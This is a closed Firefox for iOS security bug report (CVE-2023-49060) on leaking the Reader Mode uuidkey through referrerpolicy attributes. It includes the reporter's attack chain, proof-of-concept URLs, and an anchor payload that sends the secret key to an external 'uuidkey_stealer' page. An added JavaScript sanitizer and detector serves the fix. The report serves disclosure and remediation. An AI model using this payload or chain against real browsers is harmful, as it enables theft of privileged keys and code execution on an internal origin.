Closed Bug 1861405 (CVE-2023-49060) Opened 2 years ago Closed 2 years ago

Privilege escalation in Firefox for iOS through <a [referrerpolicy]> in ReaderMode

Categories

(Firefox for iOS :: General, defect)

defect

Tracking

()

VERIFIED FIXED
Tracking Status
fxios 120 ---

People

(Reporter: sdna.muneaki.nishimura, Assigned: lmarceau)

References

()

Details

(Keywords: csectype-priv-escalation, reporter-external, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(3 files, 1 obsolete file)

In Firefox for iOS, privileged contents are hosted by internal://local/* URLs, and to prevent access to the internal: pages, a secret "uuidkey"-based protection was introduced (Bug 1263627). This protection blocks transitions to any internal://local URLs when the correct uuidkey value is not specified in the query string.

If the protection is bypassed, an attacker can abuse an XSS bug in the sessionrestore page (Bug 1258188) and then any cross-origin web contents can be stolen as previously demonstrated (Bug 1279787). So, to prevent leakage of the secret "uuidkey" through the REFERER header, a referrer policy is set in some internal: pages.

But this referrer policy can be relaxed by overriding it with <a [referrerpolicy]>. For example, if <a referrerpolicy=unsafe-url> is set, the current full URL with uuidkey is sent to the external hyperlink.

In Reader Mode in Firefox for iOS, <a [referrerpolicy]> attributes are not removed when rendering the page in ReaderMode. It allows an attacker to relax the referrer policy on the page and steal the correct "uuidkey" value to an external page via the REFERER header.

The following page is a demonstration of the above bug.
Open the page in ReaderMode and click a hyperlink with the text "Click Me!!" in the page.
https://csrf.jp/2023/reader-privilege-escalation.php

In the above link, the following <a> tag is set for relaxing the referrer policy.
<a href=https://csrf.jp/2023/uuidkey_stealer.php referrerpolicy=unsafe-url>Click Me!!</a>

When you open the URL in ReaderMode and click the Click Me!!, the page is transitioned to an external page, and the "uuidkey" value is stolen through the REFERER header. The attacker's external page exploits the XSS bug in the sessionrestore page (Bug 1258188), so an alert dialog with internal://local is shown in the window.

Flags: sec-bounty?
Group: firefox-core-security → mobile-core-security
Component: Security → General
Product: Firefox → Firefox for iOS

In summary,

  • Readability.js used in Reader Mode doesn't remove the "referrerpolicy" attribute from <a> tags in the original page.
  • <a referrerpolicy="unsafe-url"> can override <meta name="referrer" content="never"> definition in the Reader Mode HTML template.
  • As a result, a secret uuidkey in a Reader Mode URL is revealed to an external page through REFERER header.
  • By setting the correct uuidkey to the target URL, access to internal://local through <a [href]> is allowed.

Jira ticket for progress tracking only (no more info available in it) can be found here

Thanks for handling this bug.

As far as I investigated, <a [referrerpolicy]> is preferred to <meta name=referrer> and Referrer-Policy header values. So, for fixing this bug, referrerpolicy attributes need to be removed from the reader mode content.

As I mentioned above, Readability.js used to generate reader mode content doesn't remove referrerpolicy attributes. So, as recommended in the README of Readability.js, we need to use a DOM sanitizer, e.g., DOMPurify, with it.
https://github.com/mozilla/readability#security

Firefox for PC uses its own sanitizer, which removes referrerpolicy attributes properly. Similarly, I think Firefox for iOS should also use a sanitizer. As far as I tested, DOMPurify removed referrerpolicy attributes from all supposed elements such as <a>, <img>, etc., in its default configuration. It seems to me that is a good way to resolve the bug.
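As an added illustration of the check the comment above asks for, the JavaScript below is not code from Firefox for iOS, Readability.js or DOMPurify. It tokenizes start tags in Reader Mode output, reports every element that carries a referrerpolicy attribute (which would override the template's <meta name="referrer" content="never">), and strips that attribute before the markup is injected into the privileged page. The sample markup, the external.example host and the BLOCKED_ATTRIBUTES set are constructed for the example.

```javascript
'use strict';

// Added example, not code from Firefox for iOS, Readability.js or DOMPurify.
// Readability.js copies attributes such as referrerpolicy from <a>/<img> into
// the Reader Mode output, and an element-level referrerpolicy wins over the
// template's <meta name="referrer" content="never">. A sanitizer therefore has
// to drop the attribute before the markup reaches the privileged origin.

// Attribute grammar: name, optionally "=" and a double-quoted, single-quoted
// or unquoted value. Quoted values may legitimately contain ">".
const ATTR_SRC = String.raw`[^\s"'<>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>]+))?`;
// A start tag: "<name", its attributes, an optional "/", then ">".
// End tags ("</p>") never match because the leading character must be a letter.
const START_TAG_RE = new RegExp(
  String.raw`<([a-zA-Z][^\s\/>]*)((?:\s+${ATTR_SRC})*)\s*(\/?)>`, 'g');
const ATTR_RE = new RegExp(
  String.raw`([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>]+)))?`, 'g');

// Attribute names the Reader Mode sanitizer must never let through.
// referrerpolicy is the one this bug is about; the set itself is an assumption.
const BLOCKED_ATTRIBUTES = new Set(['referrerpolicy']);

// Split the attribute text of one start tag into {name, value, raw} records.
// Names are lower-cased because HTML attribute names are case-insensitive.
function parseAttributes(attrText) {
  const attrs = [];
  for (const m of attrText.matchAll(ATTR_RE)) {
    let value = null; // null means a boolean attribute with no value
    if (m[2] !== undefined) value = m[2];
    else if (m[3] !== undefined) value = m[3];
    else if (m[4] !== undefined) value = m[4];
    attrs.push({ name: m[1].toLowerCase(), value, raw: m[0] });
  }
  return attrs;
}

// Detection: list every start tag carrying a blocked attribute.
function findBlockedAttributes(html) {
  const hits = [];
  for (const m of html.matchAll(START_TAG_RE)) {
    const tag = m[1].toLowerCase();
    for (const a of parseAttributes(m[2])) {
      if (BLOCKED_ATTRIBUTES.has(a.name)) hits.push({ tag, name: a.name, value: a.value });
    }
  }
  return hits;
}

// Mitigation: rebuild each start tag without the blocked attributes, keeping
// every other attribute exactly as written (original quoting preserved).
function stripBlockedAttributes(html) {
  return html.replace(START_TAG_RE, (_whole, tag, attrText, selfClose) => {
    const kept = parseAttributes(attrText)
      .filter((a) => !BLOCKED_ATTRIBUTES.has(a.name))
      .map((a) => a.raw);
    return `<${tag}${kept.length ? ' ' + kept.join(' ') : ''}${selfClose}>`;
  });
}

// Constructed sample in the shape of the reporter's PoC: one anchor and one
// image that try to relax the page's referrer policy, plus harmless markup.
const SAMPLE_HTML = [
  '<p>Some article text.</p>',
  '<a href="https://external.example/collect" referrerpolicy=unsafe-url>Click Me!!</a>',
  '<img src="https://external.example/pixel.png" REFERRERPOLICY="unsafe-url" alt="a>b">',
  '<a href="https://example.org/">no override</a>',
].join('\n');

console.log('blocked attributes found:', findBlockedAttributes(SAMPLE_HTML));
console.log('sanitized output:\n' + stripBlockedAttributes(SAMPLE_HTML));
```

The regex tokenizer is enough to show the attribute-level rule, but it is not an HTML parser; as the reporter notes, the production fix belongs in a real DOM sanitizer such as DOMPurify, whose default configuration already drops referrerpolicy. The findBlockedAttributes pass is also usable on its own as a regression check: run it over Reader Mode output for a page that sets referrerpolicy and expect an empty result.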

We have a potential fix coming up, thanks for reporting this @Muneaki

Attached file GitHub Pull Request
Assignee: nobody → lmarceau

Hello, can someone help me with some steps in order to verify this issue?
I did try on v120 (35899), the latest 120 build, with an iPhone 13 Pro (15.7.1); when I clicked on Click Me! from this URL https://csrf.jp/2023/reader-privilege-escalation.php nothing happened.
Please note that I tried with an older build to see what happens, but still nothing. There was a blank page displayed.
Is this the correct verification, or how can I figure out what I need to test exactly?

I made a simple reproduction code for confirmation below.
https://csrf.jp/2023/poc1861405.php

After opening this page in Reader Mode, tap the link labeled "Click Me!!".

If a hyperlink labeled "Exploit" appears with "Vulnerable" on the page, this vulnerability is reproduced.
When you tap the hyperlink, you can see an alert dialog with "1" on internal://local; then you can confirm that XSS is fired on the privileged internal origin.

Thank you very much Muneaki Nishimura!
I did check with the link you provided on an older version of Firefox like v118, and yes, when I entered the reader and clicked on the Click Me!! button, I was redirected to a page saying Vulnerable.

Verified as fixed on v120 (35899) with an iPhone 13 Pro (15.7.1): when I enter reader mode on https://csrf.jp/2023/poc1861405.php and tap on Click Me!!, I am redirected to a page saying Not vulnerable!

Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Group: mobile-core-security → core-security-release
Flags: sec-bounty? → sec-bounty+
Alias: CVE-2023-49060
Attached file advisory.txt (obsolete)
Attached file advisory.txt
Attachment #9364579 - Attachment is obsolete: true

Hello! Could you make this bug ticket accessible to the public?
As time has passed since the fix and this product is now already secure, I'd like to make the details of this hacktivity available for anyone to reference.

Flags: needinfo?(dveditz)
Group: core-security-release
Flags: needinfo?(dveditz)